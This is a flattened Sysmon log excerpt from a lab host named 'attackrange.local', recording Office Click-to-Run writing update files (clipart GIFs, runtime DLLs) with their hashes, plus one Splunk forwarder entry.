14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00142_.GIFMD5=CCECF61D62CD20DFB8A2E26DB5C7F398,SHA256=540A1AC8D3E504CA28178BF19B8699A920ADAC2085F9CAEFA84D23571EEE0E9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00139_.GIFMD5=99374BC68A6BBF1D09624F8C0FE91DF1,SHA256=06DD631B0A58BDFD6F9C491F678C3CFD9436696A1D7546FD4FDEDF2EB1933FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00135_.GIFMD5=512B6A518E75023A2953BD27222DCA8A,SHA256=71FA443D5FD64C8B895DCB2F8F933C50666C90C15D2B657B5768A78BAE318241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00130_.GIFMD5=F0727B2993E6F01C925FBFA1129B3ACB,SHA256=4554A6361762D4B088447647BC6F72C8AF9EAEA09A7490E38E9D1146FFFCD52F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00129_.GIFMD5=8776C625245F499B1DD7D648533F1AAF,SHA256=D3C4F00C94DA1FF904C9A9B23972A0F4A3278681E1204C5B3AE71359EC10DCEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00126_.GIFMD5=3AFA4234271C5B0453696482B58FD705,SHA256=D019D526657F76B1EB9CF6528542FDFF0DC8011DF7D6C7DC4F26E1B2ED967936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00120_.GIFMD5=E33F577836AD852F39701E4B268F6525,SHA256=5E259EF814481CFBCDBA142757CDFCDF29AFF63B85B61352AA3CDB684718792F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00103_.GIFMD5=297C1130703A8ED6258CFEF48C85B871,SHA256=E6A99CF1960027949878699899EB40294C271912DFC1495296C2EAE3387913C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00092_.GIFMD5=7DEC2F74B6617095F85C4697838D61A9,SHA256=29AE1B71C3ADBE86C249D739427A4B2C3193725318A751D61E3B463DD2B07A2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00090_.GIFMD5=8D203038CDA89C643899682DCA92FEF7,SHA256=4901FAB9DFC0FDC81596ED32E48261A62D8848485EEA875136313F03D9C9B1C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00057_.GIFMD5=0795D9C007F6DC5476B6C1EC1489D106,SHA256=D827FFC39F261D77A02FA6396EA43D6EE25AEC845B22D7AC0B31CD6B4E049B4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00052_.GIFMD5=7403CA6B13E85EB7359B210B51E8FC60,SHA256=B044E68F5CFB4A2F992016FE52FF1C1AC9680BBDD56C349732BCF2BF4301959A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00040_.GIFMD5=31200427076448F7F4EA84104F080666,SHA256=4FA5DF99252D18B0E8ABC117011F744C6CA670D1DA9A851270C069C969AC2E5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00038_.GIFMD5=FCCFA7C3B2EFC41F9680E4FD29C2909B,SHA256=C22A9EBD50F2C1A600756682CC954366E521144718E5A2797371CF56D56E2A92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00037_.GIFMD5=E9A590CCB3528DAD031EC3AAEAC1EEFC,SHA256=164AC19AE06A3C3298D2A586DD8087F2F1C3A217EFC9FAB97420972B1B092482,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00021_.GIFMD5=D6D8F4BB7426F5F992839A9FA88ADB49,SHA256=162AA4742B3E58A8E79CD7FD4C620E2A3990D796E324F2D7EC06CFD289DF9472,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00011_.GIFMD5=41F0F352FE278A3FAA618C1807D64449,SHA256=82245565B0CA21F1EE67393CF28C7CF500B2CE361F5D323FD3414CEABB412B5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AG00004_.GIFMD5=F402907DA253FE2A3CB22C0F9C638C3C,SHA256=715CE13ACDC157995CC5B4E3D5B5379684C009EFF7942FD6C5FC2BF918A208A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\vcruntime140_1.dllMD5=9040ED0FDF4CE7558CBFFB73D4C17761,SHA256=6CC4315DACEB0522816C60678344466CB452426267F70C7FAAE925361674E774,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69truetrue 23542300x800000000000000065121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.924{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\vcruntime140.dllMD5=23105A395B807D9335219958B4D0CEC1,SHA256=61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5,IMPHASH=F143E2868EFDE0FCB493BD3051708A62truetrue 23542300x800000000000000065120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\vccorlib140.dllMD5=DDD9457EF184CC3897B8198D262F4339,SHA256=41B6AF9484C860804C69E00C9D7FEE22EFE5F769C51355936FC9DE248221DE94,IMPHASH=4A5F3C3AA39A4E0497DFF0471239D5F9truetrue 23542300x800000000000000065119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\ucrtbase.dllMD5=34168A4AF676D6A5733BBF7A0905D3C7,SHA256=2AB2A74BCB5BFD8248D232EB3BC56698FB5173B9FF7FC0DAF87D8120D0F448D7,IMPHASH=5E97252FEC9CAEB9BB1DDC7CC50F68A6truetrue 23542300x800000000000000065118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\msvcr120.dllMD5=49FB6E786B2F9DF8812E0E317CED55CB,SHA256=9461F2E4ADD5C650102ACDE0C62377FF86D9B19FC20D0003F326CCD474E8B7B9,IMPHASH=8F18E22935EF8B336E246EE763FBEC97truetrue 23542300x800000000000000065117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\msvcp140.dllMD5=A1D30EF2114E18E26E2BB96555BE81BF,SHA256=F87819AE8C6F7C90D3237A1ABB9809E8CBA9DCD0C80AC3F0969A5E68EF652CA4,IMPHASH=C0E775D13A8146396B3DE4DC441694A7truetrue 23542300x800000000000000065116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\msvcp120.dllMD5=8C8D1140787DA60A343DD11C1CDF4992,SHA256=6AA1ECE9DD340D05AEC43248592A78B70D21959DE8727F506D21A3A962348583,IMPHASH=D0A59246EAB41D54812CD63C2326E1F1truetrue 23542300x800000000000000065115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\mfc140u.dllMD5=C6A732F23B907BC6D37982F47F4B4453,SHA256=C8DAB45709404E6607B21A641895C6B6953550780B2245C3792E64244A10DA8E,IMPHASH=D774F0CF6BA79D3B787D3AE2DC21DC54truetrue 23542300x800000000000000065114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.814{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98F1D158E22185A2D34E4ED6DA286473,SHA256=EF337F6CC9DBF3DA80F8B6DEA0044CFE6BDE292C1BF88ABEF80C724BE79EEB03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.799{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\concrt140.dllMD5=EB42B164D603672E07997019BB00E4AD,SHA256=DABDB0732B2FC14040CEDBBFD369D9EB3C7A2E66B38A79892E1C05E6D6A8526D,IMPHASH=E29B9617328962A9B58721E88E2FD959truetrue 23542300x800000000000000065112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.799{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\AppVLP.exeMD5=A645B6805F82C01F96F4B80077E5987F,SHA256=BE74C36A88EAC6A09EF1699BF76E7018C0DFE5EAC87CC40C899B9675CD9CDCDC,IMPHASH=FDDF6DC1DEF389880C85DC5E71621AF9truetrue 23542300x800000000000000065111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\AppVDllSurrogate64.exeMD5=1F3D3966B470725B8A45368E2CF3602A,SHA256=F56A00EA456955E263D66988254CEA05D3CBF680A4692D9DEC27B728C59E8ABB,IMPHASH=352C20A26119468E29BA1F92D2DCD568truetrue 23542300x800000000000000065110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\AppVDllSurrogate32.exeMD5=BB87D970CD29CC07A84A92E637ADD9A2,SHA256=A17CCEE308499360020E71EB305A5616D7B3163B02B20A26144355DC74E7F6CE,IMPHASH=907CF5B9C00C513E347B1BB4516C2816truetrue 23542300x800000000000000065109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-utility-l1-1-0.dllMD5=F440DC5623419E013D07DD1FCD197156,SHA256=BBA068F29609630E8C6547F1E9219E11077426C4F1E4A93B712BFBA11A149358,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-time-l1-1-0.dllMD5=05AF3F787A38ED1974FF3BDA3D752E69,SHA256=F4163CBC464A82FCE47442447351265A287561C8D64ECC2F2F97F5E73BCB4347,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-string-l1-1-0.dllMD5=3A96F417129D6E26232DC64E8FEE89A0,SHA256=01E3C0AA24CE9F8D62753702DF5D7A827C390AF5E2B76D1F1A5B96C777FD1A4E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-stdio-l1-1-0.dllMD5=53E23E326C11191A57DDF7ADA5AA3C17,SHA256=293C76A26FBC0C86DCF5906DD9D9DDC77A5609EA8C191E88BDC907C03B80A3A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-runtime-l1-1-0.dllMD5=C25321FE3A7244736383842A7C2C199F,SHA256=BF55134F17B93D8AC4D8159A952BEE17CB0C925F5256AA7F747C13E5F2D00661,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-process-l1-1-0.dllMD5=E18FD20E089CB2C2C58556575828BE36,SHA256=B06B2D8C944BFF73BD5A4AAD1CAD6A4D724633E7BD6C6B9E236E35A99B1D35F2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-private-l1-1-0.dllMD5=B4BE272187CB85E719DFB5BF48BB9B1B,SHA256=CCAF41E616B9A872D35C8083CBF8FDC14371FA3EF159FE699514643C26A4EBF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-multibyte-l1-1-0.dllMD5=FF4DE9CE85C4B01312DF6E3CDD81B0FF,SHA256=D7E676B9F1E162957D0549AB0B91E2CD754643490B0654BF9A86AA1E77CB3C37,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-math-l1-1-0.dllMD5=877C5FF146078466FF4370F3C0F02100,SHA256=9B05A43FDC185497E8C2CEA3C6B9EB0D74327BD70913A298A6E8AF64514190E8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-locale-l1-1-0.dllMD5=0D50A16C2B3EC10B4D4E80FFEB0C1074,SHA256=FAB41A942F623590402E4150A29D0F6F918EE096DBA1E8B320ADE3EC286C7475,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-heap-l1-1-0.dllMD5=5D409D47F9AEBD6015F7C71D526028C3,SHA256=7050043B0362C928AA63DD7800E5B123C775425EBA21A5C57CBC052EBC1B0BA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-filesystem-l1-1-0.dllMD5=D76F73BE5B6A2B5E2FA47BC39ECCDFE5,SHA256=6C86E40C956EB6A77313FA8DD9C46579C5421FA890043F724C004A66796D37A6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-environment-l1-1-0.dllMD5=FE93C3825A95B48C27775664DC54CAE4,SHA256=C4ED8F65C5A0DBF325482A69AB9F8CBD8C97D6120B87CE90AC4CBA54AC7D377A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-convert-l1-1-0.dllMD5=AFC20D2EF1F6042F34006D01BFE82777,SHA256=CD5256B2FB46DEAA440950E4A68466B2B0FF61F28888383094182561738D10A9,IMPHASH=00000000000000000000000000000000truetrue 